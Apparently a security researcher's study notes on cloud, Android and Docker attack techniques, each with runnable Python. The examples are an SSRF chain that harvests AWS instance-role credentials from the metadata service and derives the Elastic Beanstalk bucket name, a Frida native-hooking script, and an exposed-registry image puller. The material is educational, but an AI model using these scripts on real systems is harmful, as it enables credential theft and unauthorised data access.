Notes from Blog Posts

As a security researcher I read a lot of blog posts. Reading once doesn't mean learning (at least in my case). So I write down the important points I wish to learn from the blog posts and regularly recall them.

Cloud

Exploiting SSRF in AWS Elastic Beanstalk

  • When you find SSRF on an AWS EC2 instance, fetch http://169.254.169.254/latest/user-data (bootstrap scripts often contain secrets). Then list http://169.254.169.254/latest/meta-data/iam/security-credentials/ to get the instance role name, and fetch that role's document to obtain temporary IAM credentials (access key, secret key and session token). Caveat: if the instance enforces IMDSv2, these GETs fail without a token obtained via a PUT to /latest/api/token, which a GET-only SSRF usually cannot issue.
  • To verify the stolen credentials, configure them (including the session token) and run the command aws sts get-caller-identity; its output includes the account ID.
  • For each account and region in which Elastic Beanstalk is used, AWS creates an S3 bucket that stores the deployment source bundles, named elasticbeanstalk-<region>-<account-id>. With the account ID from the previous step the bucket name is predictable.
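The chain described in the three notes above, as an added example that is not code from the original post. The SSRF relay URL (SSRF_TEMPLATE) and the role name are hypothetical placeholders, and the two JSON samples are constructed to match the documented IMDS role document and `aws sts get-caller-identity` output, so the parsing and bucket-name derivation run offline.

```python
"""IMDS credential harvesting through an SSRF, then the Elastic Beanstalk bucket."""
import json
import urllib.parse
import urllib.request

IMDS = "http://169.254.169.254/latest"
# Hypothetical: how the vulnerable app lets us fetch an attacker-chosen URL.
SSRF_TEMPLATE = "http://target.example/fetch?url={}"


def imds_urls(role_name=None):
    """URLs to try through the SSRF, in order. Listing security-credentials/
    reveals the role name; the role document then holds the temporary keys."""
    urls = [
        f"{IMDS}/user-data",
        f"{IMDS}/meta-data/iam/security-credentials/",
    ]
    if role_name:
        urls.append(f"{IMDS}/meta-data/iam/security-credentials/{role_name}")
    return urls


def ssrf_url(target_url):
    """Wrap an IMDS URL in the (hypothetical) SSRF parameter, fully URL-encoded."""
    return SSRF_TEMPLATE.format(urllib.parse.quote(target_url, safe=""))


def parse_imds_credentials(body):
    """Turn the IMDS role document into the env vars the AWS CLI reads.
    Raises ValueError if the document does not report Code == Success."""
    doc = json.loads(body)
    if doc.get("Code") != "Success":
        raise ValueError(f"IMDS returned Code={doc.get('Code')!r}")
    return {
        "AWS_ACCESS_KEY_ID": doc["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": doc["SecretAccessKey"],
        "AWS_SESSION_TOKEN": doc["Token"],  # temporary creds are rejected without the token
        "AWS_CREDENTIAL_EXPIRATION": doc["Expiration"],
    }


def account_id_from_caller_identity(body):
    """Extract the account ID from `aws sts get-caller-identity` JSON output."""
    return json.loads(body)["Account"]


def eb_bucket_name(region, account_id):
    """Elastic Beanstalk's per-account, per-region source bundle bucket."""
    return f"elasticbeanstalk-{region}-{account_id}"


def export_lines(env):
    return [f"export {k}={v}" for k, v in env.items()]


def fetch_via_ssrf(target_url, timeout=5):
    """Live fetch through the SSRF. IMDSv2 would first need a PUT to
    /latest/api/token, which a GET-only SSRF cannot send."""
    with urllib.request.urlopen(ssrf_url(target_url), timeout=timeout) as r:
        return r.read().decode()


# Constructed samples, using the AWS documentation placeholder keys and account.
SAMPLE_ROLE_DOC = json.dumps({
    "Code": "Success",
    "LastUpdated": "2024-01-01T00:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "Token": "FwoGZXIvYXdzEXAMPLETOKEN",
    "Expiration": "2024-01-01T06:00:00Z",
})
SAMPLE_CALLER_IDENTITY = json.dumps({
    "UserId": "AROAEXAMPLE:i-0123456789abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/aws-elasticbeanstalk-ec2-role/i-0123456789abcdef0",
})


if __name__ == "__main__":
    for u in imds_urls("aws-elasticbeanstalk-ec2-role"):   # hypothetical role name
        print("try:", ssrf_url(u))
    env = parse_imds_credentials(SAMPLE_ROLE_DOC)
    print("\n".join(export_lines(env)))
    print("aws sts get-caller-identity")
    acct = account_id_from_caller_identity(SAMPLE_CALLER_IDENTITY)
    print(f"aws s3 ls s3://{eb_bucket_name('us-east-1', acct)}/")
```

The session token is the part people forget: the keys from an instance role are STS temporary credentials, and the CLI returns an auth error if AWS_SESSION_TOKEN is missing.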

Android

Instrumenting Native Android Functions using Frida

The native libraries (the .so files under lib/<abi>/ inside the APK) are loaded with System.loadLibrary after the main activity has started. A Frida script that resolves the native export at spawn time, before the app is resumed, will therefore not find the module yet and the hook never lands. Either attach once the app is already running, or hook the loader (dlopen / android_dlopen_ext) and install the native hook the moment the target library is mapped.
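One way to handle the late-loading library, as an added example that is not code from the original post or from the Frida project: a frida-python host script that injects a JavaScript agent which hooks android_dlopen_ext at spawn time and installs the real hook once the library appears. The package name, library and export (PACKAGE, LIB, SYMBOL) are hypothetical placeholders; the `frida` import is deferred to run time so the helpers can be exercised without a device.

```python
"""Hook a native export that is only loaded after the main activity (Frida host script)."""
import json

PACKAGE = "com.example.app"                                 # hypothetical
LIB = "libnative-lib.so"                                    # hypothetical
SYMBOL = "Java_com_example_app_MainActivity_checkLicense"   # hypothetical

# JavaScript agent that runs inside the app. TARGET_JSON is replaced below.
HOOK_JS = r"""
const target = TARGET_JSON;

// Frida 17 moved the static lookup to Module.findGlobalExportByName; support both.
function findGlobalExport(name) {
    return typeof Module.findGlobalExportByName === "function"
        ? Module.findGlobalExportByName(name)
        : Module.findExportByName(null, name);
}

function installHook() {
    const mod = Process.findModuleByName(target.lib);
    const addr = mod === null ? null : mod.findExportByName(target.sym);
    if (addr === null) {
        send({type: "error", msg: target.sym + " not exported by " + target.lib});
        return;
    }
    Interceptor.attach(addr, {
        onEnter(args) {
            // JNI exports receive (JNIEnv*, jobject) before their own arguments.
            send({type: "call", sym: target.sym, arg2: args[2].toString()});
        },
        onLeave(retval) {
            send({type: "ret", sym: target.sym, retval: retval.toString()});
        }
    });
    send({type: "hooked", sym: target.sym, addr: addr.toString()});
}

if (Process.findModuleByName(target.lib) !== null) {
    installHook();                       // attached late: library already mapped
} else {
    // Spawned early: wait for the loader. Apps load .so files via android_dlopen_ext.
    Interceptor.attach(findGlobalExport("android_dlopen_ext"), {
        onEnter(args) { this.path = args[0].readUtf8String(); },
        onLeave(_retval) {
            if (this.path !== null && this.path.endsWith("/" + target.lib)) {
                installHook();
            }
        }
    });
}
"""


def build_hook_script(lib=LIB, symbol=SYMBOL):
    """Embed the target as JSON so the agent never sees unescaped input."""
    return HOOK_JS.replace("TARGET_JSON", json.dumps({"lib": lib, "sym": symbol}))


def format_message(message):
    """Render one send() payload from the agent as a log line.
    Returns None for non-payload messages such as script errors."""
    if message.get("type") != "send":
        return None
    p = message["payload"]
    kind = p.get("type")
    if kind == "hooked":
        return f"[+] hooked {p['sym']} at {p['addr']}"
    if kind == "call":
        return f"[>] {p['sym']}(env, obj, {p['arg2']})"
    if kind == "ret":
        return f"[<] {p['sym']} -> {p['retval']}"
    return f"[!] {p.get('msg', p)}"


def run():
    import frida  # frida-python; only needed for the live session

    device = frida.get_usb_device()
    pid = device.spawn([PACKAGE])      # spawn so the loader hook is in place from the start
    session = device.attach(pid)
    script = session.create_script(build_hook_script())
    script.on("message", lambda msg, _data: print(format_message(msg)))
    script.load()
    device.resume(pid)                 # app starts, main activity runs, library loads, hook lands
    input("hooks armed, press Enter to detach\n")
    session.detach()


if __name__ == "__main__":
    run()
```

Hooking the loader is more robust than sleeping and retrying, because the hook is installed exactly when the library becomes resolvable and before any of its exports are called.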

Docker

Anatomy of a hack: Docker Registry

When you come across a Docker registry endpoint (the v2 API lives under /v2/ on the registry host), try browsing the following:

  • /v2/_catalog (lists repositories; paginated via ?n=<count>)
  • /v2/<REPO_NAME>/tags/list
  • /v2/<REPO_NAME>/manifests/<TAG>, sent with the header Accept: application/vnd.docker.distribution.manifest.v2+json; the manifest lists the config and layer digests, each of which can be fetched from /v2/<REPO_NAME>/blobs/<DIGEST>
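The walk described by the three endpoints above, as an added example that is not code from the original post. REGISTRY is a hypothetical placeholder and the sample catalog, tag list and manifest are constructed in the registry's documented JSON shapes, so the parsing and blob planning run offline; walk() performs the live requests.

```python
"""Walk an exposed Docker registry: catalog -> tags -> manifest -> blobs."""
import json
import urllib.request

REGISTRY = "http://registry.example:5000"   # hypothetical target
MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"


def catalog_url(registry=REGISTRY):
    return f"{registry}/v2/_catalog"


def tags_url(repo, registry=REGISTRY):
    return f"{registry}/v2/{repo}/tags/list"


def manifest_url(repo, reference, registry=REGISTRY):
    # reference is a tag ("latest") or a digest ("sha256:...")
    return f"{registry}/v2/{repo}/manifests/{reference}"


def blob_url(repo, digest, registry=REGISTRY):
    return f"{registry}/v2/{repo}/blobs/{digest}"


def get_json(url, accept=None, timeout=10):
    """GET a JSON document; the Accept header selects the schema-2 manifest."""
    req = urllib.request.Request(url, headers={"Accept": accept} if accept else {})
    with urllib.request.urlopen(req, timeout=timeout) as r:
        return json.loads(r.read().decode())


def parse_catalog(doc):
    return list(doc.get("repositories", []))


def parse_tags(doc):
    return list(doc.get("tags") or [])   # registries return null for untagged repos


def parse_manifest_layers(doc):
    """Return (config_digest, [layer digests]).
    Schema 2 has config + layers; schema 1 (served without the Accept header)
    has fsLayers/blobSum and no separate config blob."""
    if doc.get("schemaVersion") == 2:
        return doc["config"]["digest"], [l["digest"] for l in doc["layers"]]
    if doc.get("schemaVersion") == 1:
        return None, [l["blobSum"] for l in doc["fsLayers"]]
    raise ValueError(f"unknown schemaVersion {doc.get('schemaVersion')!r}")


def plan_downloads(repo, manifest, registry=REGISTRY):
    """Blob URLs needed to reconstruct the image: config first, then every layer."""
    config, layers = parse_manifest_layers(manifest)
    digests = ([config] if config else []) + layers
    return [blob_url(repo, d, registry) for d in digests]


def walk(registry=REGISTRY):
    """Live walk; prints each repo:tag followed by the blobs to pull."""
    for repo in parse_catalog(get_json(catalog_url(registry))):
        for tag in parse_tags(get_json(tags_url(repo, registry))):
            manifest = get_json(manifest_url(repo, tag, registry), accept=MANIFEST_V2)
            print(f"{repo}:{tag}")
            for url in plan_downloads(repo, manifest, registry):
                print("   ", url)


# Constructed sample responses.
SAMPLE_CATALOG = {"repositories": ["app/backend", "app/frontend"]}
SAMPLE_TAGS = {"name": "app/backend", "tags": ["latest", "1.2.0"]}
SAMPLE_MANIFEST = {
    "schemaVersion": 2,
    "mediaType": MANIFEST_V2,
    "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
               "size": 7023, "digest": "sha256:" + "c" * 64},
    "layers": [
        {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 32654, "digest": "sha256:" + "a" * 64},
        {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 16724, "digest": "sha256:" + "b" * 64},
    ],
}


if __name__ == "__main__":
    for repo in parse_catalog(SAMPLE_CATALOG):
        print(repo)
    for url in plan_downloads("app/backend", SAMPLE_MANIFEST):
        print("   ", url)
```

Each layer blob is a gzipped tar of that layer's filesystem changes, and the config blob holds the image's environment and entrypoint, which is where credentials baked into an image usually turn up.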